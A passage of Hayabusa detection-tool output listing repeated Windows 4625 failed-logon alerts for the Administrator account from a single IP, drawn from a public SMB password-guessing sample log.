NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: 